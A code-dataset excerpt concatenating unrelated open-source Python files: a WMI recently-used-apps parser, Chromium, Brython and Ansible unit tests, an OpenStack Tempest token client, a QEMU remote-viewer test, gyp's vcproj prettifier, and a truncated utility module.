raise RuntimeError("Invalid mapping type: {:s}".format(type_))
Values = ["FolderPath", "ExplorerFileName", "FileSize", "LastUserName", "LastUsedTime", "TimeZoneOffset",
"LaunchCount", "OriginalFileName", "FileDescription", "CompanyName", "ProductName", "ProductVersion",
"FileVersion", "AdditionalProductCodes", "msiVersion", "msiDisplayName", "ProductCode",
"SoftwarePropertiesHash", "ProductLanguage", "FilePropertiesHash", "msiPublisher"]
print("\t".join(Values))
c = CIM(type_, path)
try:
with Namespace(c, "root\\ccm\\SoftwareMeteringAgent") as ns:
for RUA in ns.class_("CCM_RecentlyUsedApps").instances:
RUAValues = []
for Value in Values:
try:
if Value == "LastUsedTime":
Time = str(RUA.properties[Value].value)
ExcelTime = "{}-{}-{} {}:{}:{}".format(Time[0:4], Time[4:6], Time[6:8], Time[8:10],
Time[10:12], Time[12:14])
RUAValues.append(ExcelTime)
elif Value == "TimeZoneOffset":
Time = str(RUA.properties[Value].value)
TimeOffset = '="{}"'.format(Time[-4:])
RUAValues.append(TimeOffset)
else:
RUAValues.append(str(RUA.properties[Value].value))
except KeyError:
RUAValues.append("")
print("\t".join(RUAValues))
except IndexError:
raise RuntimeError("CCM Software Metering Agent path 'root\\\\ccm\\\\SoftwareMeteringAgent' not found.")
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
import sys
main(*sys.argv[1:])
| apache-2.0 |
GeyerA/android_external_chromium_org | native_client_sdk/src/build_tools/tests/sdktools_config_test.py | 160 | 1609 | #!/usr/bin/env python
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import sys
import os
import unittest
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
BUILD_TOOLS_DIR = os.path.dirname(SCRIPT_DIR)
sys.path.append(BUILD_TOOLS_DIR)
import sdk_tools.config as config
class TestSdkToolsConfig(unittest.TestCase):
def testInvalidSyntax(self):
invalid_json = "# oops\n"
cfg = config.Config()
self.assertRaises(config.Error, lambda: cfg.LoadJson(invalid_json))
def testEmptyConfig(self):
"""Test that empty config contains just empty sources list."""
expected = '{\n "sources": []\n}'
cfg = config.Config()
json_output = cfg.ToJson()
self.assertEqual(json_output, expected)
def testIntegerSetting(self):
json_input = '{ "setting": 3 }'
cfg = config.Config()
cfg.LoadJson(json_input)
self.assertEqual(cfg.setting, 3)
def testReadWrite(self):
json_input1 = '{\n "sources": [], \n "setting": 3\n}'
json_input2 = '{\n "setting": 3\n}'
for json_input in (json_input1, json_input2):
cfg = config.Config()
cfg.LoadJson(json_input)
json_output = cfg.ToJson()
self.assertEqual(json_output, json_input1)
def testAddSource(self):
cfg = config.Config()
cfg.AddSource('http://localhost/foo')
json_output = cfg.ToJson()
expected = '{\n "sources": [\n "http://localhost/foo"\n ]\n}'
self.assertEqual(json_output, expected)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
40223125/40223125-2 | static/Brython3.1.1-20150328-091302/Lib/unittest/test/testmock/testwith.py | 739 | 5806 | import unittest
from warnings import catch_warnings
from unittest.test.testmock.support import is_instance
from unittest.mock import MagicMock, Mock, patch, sentinel, mock_open, call
something = sentinel.Something
something_else = sentinel.SomethingElse
class WithTest(unittest.TestCase):
def test_with_statement(self):
with patch('%s.something' % __name__, sentinel.Something2):
self.assertEqual(something, sentinel.Something2, "unpatched")
self.assertEqual(something, sentinel.Something)
def test_with_statement_exception(self):
try:
with patch('%s.something' % __name__, sentinel.Something2):
self.assertEqual(something, sentinel.Something2, "unpatched")
raise Exception('pow')
except Exception:
pass
else:
self.fail("patch swallowed exception")
self.assertEqual(something, sentinel.Something)
def test_with_statement_as(self):
with patch('%s.something' % __name__) as mock_something:
self.assertEqual(something, mock_something, "unpatched")
self.assertTrue(is_instance(mock_something, MagicMock),
"patching wrong type")
self.assertEqual(something, sentinel.Something)
def test_patch_object_with_statement(self):
class Foo(object):
something = 'foo'
original = Foo.something
with patch.object(Foo, 'something'):
self.assertNotEqual(Foo.something, original, "unpatched")
self.assertEqual(Foo.something, original)
def test_with_statement_nested(self):
with catch_warnings(record=True):
with patch('%s.something' % __name__) as mock_something, patch('%s.something_else' % __name__) as mock_something_else:
self.assertEqual(something, mock_something, "unpatched")
self.assertEqual(something_else, mock_something_else,
"unpatched")
self.assertEqual(something, sentinel.Something)
self.assertEqual(something_else, sentinel.SomethingElse)
def test_with_statement_specified(self):
with patch('%s.something' % __name__, sentinel.Patched) as mock_something:
self.assertEqual(something, mock_something, "unpatched")
self.assertEqual(mock_something, sentinel.Patched, "wrong patch")
self.assertEqual(something, sentinel.Something)
def testContextManagerMocking(self):
mock = Mock()
mock.__enter__ = Mock()
mock.__exit__ = Mock()
mock.__exit__.return_value = False
with mock as m:
self.assertEqual(m, mock.__enter__.return_value)
mock.__enter__.assert_called_with()
mock.__exit__.assert_called_with(None, None, None)
def test_context_manager_with_magic_mock(self):
mock = MagicMock()
with self.assertRaises(TypeError):
with mock:
'foo' + 3
mock.__enter__.assert_called_with()
self.assertTrue(mock.__exit__.called)
def test_with_statement_same_attribute(self):
with patch('%s.something' % __name__, sentinel.Patched) as mock_something:
self.assertEqual(something, mock_something, "unpatched")
with patch('%s.something' % __name__) as mock_again:
self.assertEqual(something, mock_again, "unpatched")
self.assertEqual(something, mock_something,
"restored with wrong instance")
self.assertEqual(something, sentinel.Something, "not restored")
def test_with_statement_imbricated(self):
with patch('%s.something' % __name__) as mock_something:
self.assertEqual(something, mock_something, "unpatched")
with patch('%s.something_else' % __name__) as mock_something_else:
self.assertEqual(something_else, mock_something_else,
"unpatched")
self.assertEqual(something, sentinel.Something)
self.assertEqual(something_else, sentinel.SomethingElse)
def test_dict_context_manager(self):
foo = {}
with patch.dict(foo, {'a': 'b'}):
self.assertEqual(foo, {'a': 'b'})
self.assertEqual(foo, {})
with self.assertRaises(NameError):
with patch.dict(foo, {'a': 'b'}):
self.assertEqual(foo, {'a': 'b'})
raise NameError('Konrad')
self.assertEqual(foo, {})
class TestMockOpen(unittest.TestCase):
def test_mock_open(self):
mock = mock_open()
with patch('%s.open' % __name__, mock, create=True) as patched:
self.assertIs(patched, mock)
open('foo')
mock.assert_called_once_with('foo')
def test_mock_open_context_manager(self):
mock = mock_open()
handle = mock.return_value
with patch('%s.open' % __name__, mock, create=True):
with open('foo') as f:
f.read()
expected_calls = [call('foo'), call().__enter__(), call().read(),
call().__exit__(None, None, None)]
self.assertEqual(mock.mock_calls, expected_calls)
self.assertIs(f, handle)
def test_explicit_mock(self):
mock = MagicMock()
mock_open(mock)
with patch('%s.open' % __name__, mock, create=True) as patched:
self.assertIs(patched, mock)
open('foo')
mock.assert_called_once_with('foo')
def test_read_data(self):
mock = mock_open(read_data='foo')
with patch('%s.open' % __name__, mock, create=True):
h = open('bar')
result = h.read()
self.assertEqual(result, 'foo')
if __name__ == '__main__':
unittest.main()
| gpl-3.0 |
zsoltdudas/lis-tempest | tempest/lib/services/identity/v3/token_client.py | 5 | 6905 | # Copyright 2015 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from oslo_serialization import jsonutils as json
from tempest.lib.common import rest_client
from tempest.lib import exceptions
class V3TokenClient(rest_client.RestClient):
def __init__(self, auth_url, disable_ssl_certificate_validation=None,
ca_certs=None, trace_requests=None):
dscv = disable_ssl_certificate_validation
super(V3TokenClient, self).__init__(
None, None, None, disable_ssl_certificate_validation=dscv,
ca_certs=ca_certs, trace_requests=trace_requests)
if auth_url is None:
raise exceptions.IdentityError("Couldn't determine auth_url")
if 'auth/tokens' not in auth_url:
auth_url = auth_url.rstrip('/') + '/auth/tokens'
self.auth_url = auth_url
def auth(self, user_id=None, username=None, password=None, project_id=None,
project_name=None, user_domain_id=None, user_domain_name=None,
project_domain_id=None, project_domain_name=None, domain_id=None,
domain_name=None, token=None):
"""Obtains a token from the authentication service
:param user_id: user id
:param username: user name
:param user_domain_id: the user domain id
:param user_domain_name: the user domain name
:param project_domain_id: the project domain id
:param project_domain_name: the project domain name
:param domain_id: a domain id to scope to
:param domain_name: a domain name to scope to
:param project_id: a project id to scope to
:param project_name: a project name to scope to
:param token: a token to re-scope.
Accepts different combinations of credentials.
Sample sample valid combinations:
- token
- token, project_name, project_domain_id
- user_id, password
- username, password, user_domain_id
- username, password, project_name, user_domain_id, project_domain_id
Validation is left to the server side.
"""
creds = {
'auth': {
'identity': {
'methods': [],
}
}
}
id_obj = creds['auth']['identity']
if token:
id_obj['methods'].append('token')
id_obj['token'] = {
'id': token
}
if (user_id or username) and password:
id_obj['methods'].append('password')
id_obj['password'] = {
'user': {
'password': password,
}
}
if user_id:
id_obj['password']['user']['id'] = user_id
else:
id_obj['password']['user']['name'] = username
_domain = None
if user_domain_id is not None:
_domain = dict(id=user_domain_id)
elif user_domain_name is not None:
_domain = dict(name=user_domain_name)
if _domain:
id_obj['password']['user']['domain'] = _domain
if (project_id or project_name):
_project = dict()
if project_id:
_project['id'] = project_id
elif project_name:
_project['name'] = project_name
if project_domain_id is not None:
_project['domain'] = {'id': project_domain_id}
elif project_domain_name is not None:
_project['domain'] = {'name': project_domain_name}
creds['auth']['scope'] = dict(project=_project)
elif domain_id:
creds['auth']['scope'] = dict(domain={'id': domain_id})
elif domain_name:
creds['auth']['scope'] = dict(domain={'name': domain_name})
body = json.dumps(creds, sort_keys=True)
resp, body = self.post(self.auth_url, body=body)
self.expected_success(201, resp.status)
return rest_client.ResponseBody(resp, body)
def request(self, method, url, extra_headers=False, headers=None,
body=None):
"""A simple HTTP request interface."""
if headers is None:
# Always accept 'json', for xml token client too.
# Because XML response is not easily
# converted to the corresponding JSON one
headers = self.get_headers(accept_type="json")
elif extra_headers:
try:
headers.update(self.get_headers(accept_type="json"))
except (ValueError, TypeError):
headers = self.get_headers(accept_type="json")
resp, resp_body = self.raw_request(url, method,
headers=headers, body=body)
self._log_request(method, url, resp, req_headers=headers,
req_body='<omitted>', resp_body=resp_body)
if resp.status in [401, 403]:
resp_body = json.loads(resp_body)
raise exceptions.Unauthorized(resp_body['error']['message'])
elif resp.status not in [200, 201, 204]:
raise exceptions.IdentityError(
'Unexpected status code {0}'.format(resp.status))
return resp, json.loads(resp_body)
def get_token(self, **kwargs):
"""Returns (token id, token data) for supplied credentials"""
auth_data = kwargs.pop('auth_data', False)
if not (kwargs.get('user_domain_id') or
kwargs.get('user_domain_name')):
kwargs['user_domain_name'] = 'Default'
if not (kwargs.get('project_domain_id') or
kwargs.get('project_domain_name')):
kwargs['project_domain_name'] = 'Default'
body = self.auth(**kwargs)
token = body.response.get('x-subject-token')
if auth_data:
return token, body['token']
else:
return token
class V3TokenClientJSON(V3TokenClient):
LOG = logging.getLogger(__name__)
def _warn(self):
self.LOG.warning("%s class was deprecated and renamed to %s" %
(self.__class__.__name__, 'V3TokenClient'))
def __init__(self, *args, **kwargs):
self._warn()
super(V3TokenClientJSON, self).__init__(*args, **kwargs)
| apache-2.0 |
tolimit/tp-qemu | qemu/tests/rv_fullscreen.py | 9 | 3359 | """
rv_fullscreen.py - remote-viewer full screen
Testing the remote-viewer --full-screen option
If successful, the resolution of the guest will
take the resolution of the client.
Requires: connected binaries remote-viewer, Xorg, gnome session
"""
import logging
from aexpect import ShellCmdError
from autotest.client.shared import error
def run(test, params, env):
"""
Tests the --full-screen option
Positive test: full_screen param = yes, verify guest res = client res
Negative test: full_screen param= no, verify guest res != client res
:param test: QEMU test object.
:param params: Dictionary with the test parameters.
:param env: Dictionary with test environment.
"""
# Get the parameters needed for the test
full_screen = params.get("full_screen")
guest_vm = env.get_vm(params["guest_vm"])
client_vm = env.get_vm(params["client_vm"])
guest_vm.verify_alive()
guest_session = guest_vm.wait_for_login(
timeout=int(params.get("login_timeout", 360)))
client_vm.verify_alive()
client_session = client_vm.wait_for_login(
timeout=int(params.get("login_timeout", 360)))
# Get the resolution of the client & guest
logging.info("Getting the Resolution on the client")
client_session.cmd("export DISPLAY=:0.0")
try:
client_session.cmd("xrandr | grep '*' >/tmp/res")
client_res_raw = client_session.cmd("cat /tmp/res|awk '{print $1}'")
client_res = client_res_raw.split()[0]
except ShellCmdError:
raise error.TestFail("Could not get guest resolution, xrandr output:" +
" %s" % client_res_raw)
except IndexError:
raise error.TestFail("Could not get guest resolution, xrandr output:" +
" %s" % client_res_raw)
logging.info("Getting the Resolution on the guest")
guest_session.cmd("export DISPLAY=:0.0")
try:
guest_session.cmd("xrandr | grep '*' >/tmp/res")
guest_res_raw = guest_session.cmd("cat /tmp/res|awk '{print $1}'")
guest_res = guest_res_raw.split()[0]
except ShellCmdError:
raise error.TestFail("Could not get guest resolution, xrandr output:" +
" %s" % guest_res_raw)
except IndexError:
raise error.TestFail("Could not get guest resolution, xrandr output:" +
" %s" % guest_res_raw)
logging.info("Here's the information I have: ")
logging.info("\nClient Resolution: " + client_res)
logging.info("\nGuest Resolution: " + guest_res)
# Positive Test, verify the guest takes the resolution of the client
if full_screen == "yes":
if(client_res == guest_res):
logging.info("PASS: Guest resolution is the same as the client")
else:
raise error.TestFail("Guest resolution differs from the client")
# Negative Test, verify the resolutions are not equal
elif full_screen == "no":
if(client_res != guest_res):
logging.info("PASS: Guest resolution differs from the client")
else:
raise error.TestFail("Guest resolution is the same as the client")
else:
raise error.TestFail("The test setup is incorrect.")
client_session.close()
guest_session.close()
| gpl-2.0 |
rosmo/ansible | test/units/modules/storage/netapp/test_na_ontap_firewall_policy.py | 25 | 10657 | # (c) 2018, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
''' unit test template for ONTAP Ansible module '''
from __future__ import print_function
import json
import pytest
from units.compat import unittest
from units.compat.mock import patch, Mock
from ansible.module_utils import basic
from ansible.module_utils._text import to_bytes
import ansible.module_utils.netapp as netapp_utils
from ansible.modules.storage.netapp.na_ontap_firewall_policy \
import NetAppONTAPFirewallPolicy as fp_module # module under test
if not netapp_utils.has_netapp_lib():
pytestmark = pytest.mark.skip('skipping as missing required netapp_lib')
def set_module_args(args):
"""prepare arguments so that they will be picked up during module creation"""
args = json.dumps({'ANSIBLE_MODULE_ARGS': args})
basic._ANSIBLE_ARGS = to_bytes(args) # pylint: disable=protected-access
class AnsibleExitJson(Exception):
"""Exception class to be raised by module.exit_json and caught by the test case"""
pass
class AnsibleFailJson(Exception):
"""Exception class to be raised by module.fail_json and caught by the test case"""
pass
def exit_json(*args, **kwargs): # pylint: disable=unused-argument
"""function to patch over exit_json; package return data into an exception"""
if 'changed' not in kwargs:
kwargs['changed'] = False
raise AnsibleExitJson(kwargs)
def fail_json(*args, **kwargs): # pylint: disable=unused-argument
"""function to patch over fail_json; package return data into an exception"""
kwargs['failed'] = True
raise AnsibleFailJson(kwargs)
class MockONTAPConnection(object):
''' mock server connection to ONTAP host '''
def __init__(self, kind=None, data=None):
''' save arguments '''
self.kind = kind
self.data = data
self.xml_in = None
self.xml_out = None
def invoke_successfully(self, xml, enable_tunneling): # pylint: disable=unused-argument
''' mock invoke_successfully returning xml data '''
self.xml_in = xml
if self.kind == 'policy':
xml = self.build_policy_info(self.data)
if self.kind == 'config':
xml = self.build_firewall_config_info(self.data)
self.xml_out = xml
return xml
@staticmethod
def build_policy_info(data):
''' build xml data for net-firewall-policy-info '''
xml = netapp_utils.zapi.NaElement('xml')
attributes = {
'num-records': 1,
'attributes-list': {
'net-firewall-policy-info': {
'policy': data['policy'],
'service': data['service'],
'allow-list': [
{'ip-and-mask': '1.2.3.0/24'}
]
}
}
}
xml.translate_struct(attributes)
return xml
@staticmethod
def build_firewall_config_info(data):
''' build xml data for net-firewall-config-info '''
xml = netapp_utils.zapi.NaElement('xml')
attributes = {
'attributes': {
'net-firewall-config-info': {
'is-enabled': 'true',
'is-logging': 'false'
}
}
}
xml.translate_struct(attributes)
return xml
class TestMyModule(unittest.TestCase):
''' a group of related Unit Tests '''
def setUp(self):
self.mock_module_helper = patch.multiple(basic.AnsibleModule,
exit_json=exit_json,
fail_json=fail_json)
self.mock_module_helper.start()
self.addCleanup(self.mock_module_helper.stop)
self.mock_policy = {
'policy': 'test',
'service': 'http',
'vserver': 'my_vserver',
'allow_list': '1.2.3.0/24'
}
self.mock_config = {
'node': 'test',
'enable': 'enable',
'logging': 'enable'
}
def mock_policy_args(self):
return {
'policy': self.mock_policy['policy'],
'service': self.mock_policy['service'],
'vserver': self.mock_policy['vserver'],
'allow_list': [self.mock_policy['allow_list']],
'hostname': 'test',
'username': 'test_user',
'password': 'test_pass!'
}
def mock_config_args(self):
return {
'node': self.mock_config['node'],
'enable': self.mock_config['enable'],
'logging': self.mock_config['logging'],
'hostname': 'test',
'username': 'test_user',
'password': 'test_pass!'
}
def get_mock_object(self, kind=None):
"""
Helper method to return an na_ontap_firewall_policy object
:param kind: passes this param to MockONTAPConnection()
:return: na_ontap_firewall_policy object
"""
obj = fp_module()
obj.autosupport_log = Mock(return_value=None)
if kind is None:
obj.server = MockONTAPConnection()
else:
mock_data = self.mock_config if kind == 'config' else self.mock_policy
obj.server = MockONTAPConnection(kind=kind, data=mock_data)
return obj
def test_module_fail_when_required_args_missing(self):
''' required arguments are reported as errors '''
with pytest.raises(AnsibleFailJson) as exc:
set_module_args({})
fp_module()
print('Info: %s' % exc.value.args[0]['msg'])
def test_helper_firewall_policy_attributes(self):
''' helper returns dictionary with vserver, service and policy details '''
data = self.mock_policy
set_module_args(self.mock_policy_args())
result = self.get_mock_object('policy').firewall_policy_attributes()
del data['allow_list']
assert data == result
def test_helper_validate_ip_addresses_positive(self):
''' test if helper validates if IP is a network address '''
data = self.mock_policy_args()
data['allow_list'] = ['1.2.0.0/16', '1.2.3.0/24']
set_module_args(data)
result = self.get_mock_object().validate_ip_addresses()
assert result is None
def test_helper_validate_ip_addresses_negative(self):
''' test if helper validates if IP is a network address '''
data = self.mock_policy_args()
data['allow_list'] = ['1.2.0.10/16', '1.2.3.0/24']
set_module_args(data)
with pytest.raises(AnsibleFailJson) as exc:
self.get_mock_object().validate_ip_addresses()
msg = 'Error: Invalid IP address value for allow_list parameter.' \
'Please specify a network address without host bits set: ' \
'1.2.0.10/16 has host bits set'
assert exc.value.args[0]['msg'] == msg
def test_get_nonexistent_policy(self):
''' Test if get_firewall_policy returns None for non-existent policy '''
set_module_args(self.mock_policy_args())
result = self.get_mock_object().get_firewall_policy()
assert result is None
def test_get_existing_policy(self):
''' Test if get_firewall_policy returns policy details for existing policy '''
data = self.mock_policy_args()
set_module_args(data)
result = self.get_mock_object('policy').get_firewall_policy()
assert result['service'] == data['service']
assert result['allow_list'] == ['1.2.3.0/24'] # from build_policy_info()
def test_successful_create(self):
''' Test successful create '''
set_module_args(self.mock_policy_args())
with pytest.raises(AnsibleExitJson) as exc:
self.get_mock_object().apply()
assert exc.value.args[0]['changed']
def test_create_idempotency(self):
''' Test create idempotency '''
set_module_args(self.mock_policy_args())
with pytest.raises(AnsibleExitJson) as exc:
self.get_mock_object('policy').apply()
assert not exc.value.args[0]['changed']
def test_successful_delete(self):
''' Test delete existing job '''
data = self.mock_policy_args()
data['state'] = 'absent'
set_module_args(data)
with pytest.raises(AnsibleExitJson) as exc:
self.get_mock_object('policy').apply()
assert exc.value.args[0]['changed']
def test_delete_idempotency(self):
''' Test delete idempotency '''
data = self.mock_policy_args()
data['state'] = 'absent'
set_module_args(data)
with pytest.raises(AnsibleExitJson) as exc:
self.get_mock_object().apply()
assert not exc.value.args[0]['changed']
def test_successful_modify(self):
''' Test successful modify allow_list '''
data = self.mock_policy_args()
data['allow_list'] = ['1.2.0.0/16']
set_module_args(data)
with pytest.raises(AnsibleExitJson) as exc:
self.get_mock_object('policy').apply()
assert exc.value.args[0]['changed']
def test_successful_modify_mutiple_ips(self):
''' Test successful modify allow_list '''
data = self.mock_policy_args()
data['allow_list'] = ['1.2.0.0/16', '1.0.0.0/8']
set_module_args(data)
with pytest.raises(AnsibleExitJson) as exc:
self.get_mock_object('policy').apply()
assert exc.value.args[0]['changed']
def test_get_nonexistent_config(self):
''' Test if get_firewall_config returns None for non-existent node '''
set_module_args(self.mock_config_args())
result = self.get_mock_object().get_firewall_config_for_node()
assert result is None
def test_get_existing_config(self):
''' Test if get_firewall_config returns policy details for existing node '''
data = self.mock_config_args()
set_module_args(data)
result = self.get_mock_object('config').get_firewall_config_for_node()
assert result['enable'] == 'enable' # from build_config_info()
assert result['logging'] == 'disable' # from build_config_info()
def test_successful_modify_config(self):
''' Test successful modify allow_list '''
data = self.mock_config_args()
data['enable'] = 'disable'
data['logging'] = 'enable'
set_module_args(data)
with pytest.raises(AnsibleExitJson) as exc:
self.get_mock_object('config').apply()
assert exc.value.args[0]['changed']
| gpl-3.0 |
vito16/express2 | node_modules/cordova/node_modules/plugman/node_modules/npm/node_modules/node-gyp/gyp/tools/pretty_vcproj.py | 2637 | 9586 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Make the format of a vcproj really pretty.
This script normalize and sort an xml. It also fetches all the properties
inside linked vsprops and include them explicitly in the vcproj.
It outputs the resulting xml to stdout.
"""
__author__ = 'nsylvain (Nicolas Sylvain)'
import os
import sys
from xml.dom.minidom import parse
from xml.dom.minidom import Node
REPLACEMENTS = dict()
ARGUMENTS = None
class CmpTuple(object):
"""Compare function between 2 tuple."""
def __call__(self, x, y):
return cmp(x[0], y[0])
class CmpNode(object):
"""Compare function between 2 xml nodes."""
def __call__(self, x, y):
def get_string(node):
node_string = "node"
node_string += node.nodeName
if node.nodeValue:
node_string += node.nodeValue
if node.attributes:
# We first sort by name, if present.
node_string += node.getAttribute("Name")
all_nodes = []
for (name, value) in node.attributes.items():
all_nodes.append((name, value))
all_nodes.sort(CmpTuple())
for (name, value) in all_nodes:
node_string += name
node_string += value
return node_string
return cmp(get_string(x), get_string(y))
def PrettyPrintNode(node, indent=0):
if node.nodeType == Node.TEXT_NODE:
if node.data.strip():
print '%s%s' % (' '*indent, node.data.strip())
return
if node.childNodes:
node.normalize()
# Get the number of attributes
attr_count = 0
if node.attributes:
attr_count = node.attributes.length
# Print the main tag
if attr_count == 0:
print '%s<%s>' % (' '*indent, node.nodeName)
else:
print '%s<%s' % (' '*indent, node.nodeName)
all_attributes = []
for (name, value) in node.attributes.items():
all_attributes.append((name, value))
all_attributes.sort(CmpTuple())
for (name, value) in all_attributes:
print '%s %s="%s"' % (' '*indent, name, value)
print '%s>' % (' '*indent)
if node.nodeValue:
print '%s %s' % (' '*indent, node.nodeValue)
for sub_node in node.childNodes:
PrettyPrintNode(sub_node, indent=indent+2)
print '%s</%s>' % (' '*indent, node.nodeName)
def FlattenFilter(node):
"""Returns a list of all the node and sub nodes."""
node_list = []
if (node.attributes and
node.getAttribute('Name') == '_excluded_files'):
# We don't add the "_excluded_files" filter.
return []
for current in node.childNodes:
if current.nodeName == 'Filter':
node_list.extend(FlattenFilter(current))
else:
node_list.append(current)
return node_list
def FixFilenames(filenames, current_directory):
new_list = []
for filename in filenames:
if filename:
for key in REPLACEMENTS:
filename = filename.replace(key, REPLACEMENTS[key])
os.chdir(current_directory)
filename = filename.strip('"\' ')
if filename.startswith('$'):
new_list.append(filename)
else:
new_list.append(os.path.abspath(filename))
return new_list
def AbsoluteNode(node):
"""Makes all the properties we know about in this node absolute."""
if node.attributes:
for (name, value) in node.attributes.items():
if name in ['InheritedPropertySheets', 'RelativePath',
'AdditionalIncludeDirectories',
'IntermediateDirectory', 'OutputDirectory',
'AdditionalLibraryDirectories']:
# We want to fix up these paths
path_list = value.split(';')
new_list = FixFilenames(path_list, os.path.dirname(ARGUMENTS[1]))
node.setAttribute(name, ';'.join(new_list))
if not value:
node.removeAttribute(name)
def CleanupVcproj(node):
"""For each sub node, we call recursively this function."""
for sub_node in node.childNodes:
AbsoluteNode(sub_node)
CleanupVcproj(sub_node)
# Normalize the node, and remove all extranous whitespaces.
for sub_node in node.childNodes:
if sub_node.nodeType == Node.TEXT_NODE:
sub_node.data = sub_node.data.replace("\r", "")
sub_node.data = sub_node.data.replace("\n", "")
sub_node.data = sub_node.data.rstrip()
# Fix all the semicolon separated attributes to be sorted, and we also
# remove the dups.
if node.attributes:
for (name, value) in node.attributes.items():
sorted_list = sorted(value.split(';'))
unique_list = []
for i in sorted_list:
if not unique_list.count(i):
unique_list.append(i)
node.setAttribute(name, ';'.join(unique_list))
if not value:
node.removeAttribute(name)
if node.childNodes:
node.normalize()
# For each node, take a copy, and remove it from the list.
node_array = []
while node.childNodes and node.childNodes[0]:
# Take a copy of the node and remove it from the list.
current = node.childNodes[0]
node.removeChild(current)
# If the child is a filter, we want to append all its children
# to this same list.
if current.nodeName == 'Filter':
node_array.extend(FlattenFilter(current))
else:
node_array.append(current)
# Sort the list.
node_array.sort(CmpNode())
# Insert the nodes in the correct order.
for new_node in node_array:
# But don't append empty tool node.
if new_node.nodeName == 'Tool':
if new_node.attributes and new_node.attributes.length == 1:
# This one was empty.
continue
if new_node.nodeName == 'UserMacro':
continue
node.appendChild(new_node)
def GetConfiguationNodes(vcproj):
#TODO(nsylvain): Find a better way to navigate the xml.
nodes = []
for node in vcproj.childNodes:
if node.nodeName == "Configurations":
for sub_node in node.childNodes:
if sub_node.nodeName == "Configuration":
nodes.append(sub_node)
return nodes
def GetChildrenVsprops(filename):
dom = parse(filename)
if dom.documentElement.attributes:
vsprops = dom.documentElement.getAttribute('InheritedPropertySheets')
return FixFilenames(vsprops.split(';'), os.path.dirname(filename))
return []
def SeekToNode(node1, child2):
# A text node does not have properties.
if child2.nodeType == Node.TEXT_NODE:
return None
# Get the name of the current node.
current_name = child2.getAttribute("Name")
if not current_name:
# There is no name. We don't know how to merge.
return None
# Look through all the nodes to find a match.
for sub_node in node1.childNodes:
if sub_node.nodeName == child2.nodeName:
name = sub_node.getAttribute("Name")
if name == current_name:
return sub_node
# No match. We give up.
return None
def MergeAttributes(node1, node2):
# No attributes to merge?
if not node2.attributes:
return
for (name, value2) in node2.attributes.items():
# Don't merge the 'Name' attribute.
if name == 'Name':
continue
value1 = node1.getAttribute(name)
if value1:
# The attribute exist in the main node. If it's equal, we leave it
# untouched, otherwise we concatenate it.
if value1 != value2:
node1.setAttribute(name, ';'.join([value1, value2]))
else:
# The attribute does nto exist in the main node. We append this one.
node1.setAttribute(name, value2)
# If the attribute was a property sheet attributes, we remove it, since
# they are useless.
if name == 'InheritedPropertySheets':
node1.removeAttribute(name)
def MergeProperties(node1, node2):
MergeAttributes(node1, node2)
for child2 in node2.childNodes:
child1 = SeekToNode(node1, child2)
if child1:
MergeProperties(child1, child2)
else:
node1.appendChild(child2.cloneNode(True))
def main(argv):
"""Main function of this vcproj prettifier."""
global ARGUMENTS
ARGUMENTS = argv
# check if we have exactly 1 parameter.
if len(argv) < 2:
print ('Usage: %s "c:\\path\\to\\vcproj.vcproj" [key1=value1] '
'[key2=value2]' % argv[0])
return 1
# Parse the keys
for i in range(2, len(argv)):
(key, value) = argv[i].split('=')
REPLACEMENTS[key] = value
# Open the vcproj and parse the xml.
dom = parse(argv[1])
# First thing we need to do is find the Configuration Node and merge them
# with the vsprops they include.
for configuration_node in GetConfiguationNodes(dom.documentElement):
# Get the property sheets associated with this configuration.
vsprops = configuration_node.getAttribute('InheritedPropertySheets')
# Fix the filenames to be absolute.
vsprops_list = FixFilenames(vsprops.strip().split(';'),
os.path.dirname(argv[1]))
# Extend the list of vsprops with all vsprops contained in the current
# vsprops.
for current_vsprops in vsprops_list:
vsprops_list.extend(GetChildrenVsprops(current_vsprops))
# Now that we have all the vsprops, we need to merge them.
for current_vsprops in vsprops_list:
MergeProperties(configuration_node,
parse(current_vsprops).documentElement)
# Now that everything is merged, we need to cleanup the xml.
CleanupVcproj(dom.documentElement)
# Finally, we use the prett xml function to print the vcproj back to the
# user.
#print dom.toprettyxml(newl="\n")
PrettyPrintNode(dom.documentElement)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
| mit |
nickjhathaway/gtkmmExperiment | scripts/pyUtils/utils.py | 8 | 7400 | #!/usr/bin/env python3
import urllib.request, urllib.parse, urllib.error, os, shutil, tarfile, multiprocessing, subprocess, sys, socket
from color_text import ColorText as CT
class Utils:
@staticmethod
def isMac():
return sys.platform == "darwin"
@staticmethod
def connectedInternet():
#from http://stackoverflow.com/questions/20913411/test-if-an-internet-connection-is-present-in-python
try:
# see if we can resolve the host name -- tells us if there is
# a DNS listening
host = socket.gethostbyname("www.google.com")
# connect to the host -- tells us if the host is actually
# reachable
s = socket.create_connection((host, 80), 2)
return True
except:
pass
return False
@staticmethod
def which(program):
#from http://stackoverflow.com/questions/377017/test-if-executable-exists-in-python
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
@staticmethod
def hasProgram(program):
whichOutput = Utils.which(program);
return None != whichOutput;
@staticmethod
def run_in_dir(cmd, d):
#print CT.boldBlack("here")
cmd = "cd " + Utils.shellquote(d) + " && " + cmd + " && cd -"
#print CT.boldBlack("newcmd")
print(CT.boldGreen(cmd))
Utils.run(cmd)
@staticmethod
def run(cmd):
# from http://stackoverflow.com/a/4418193
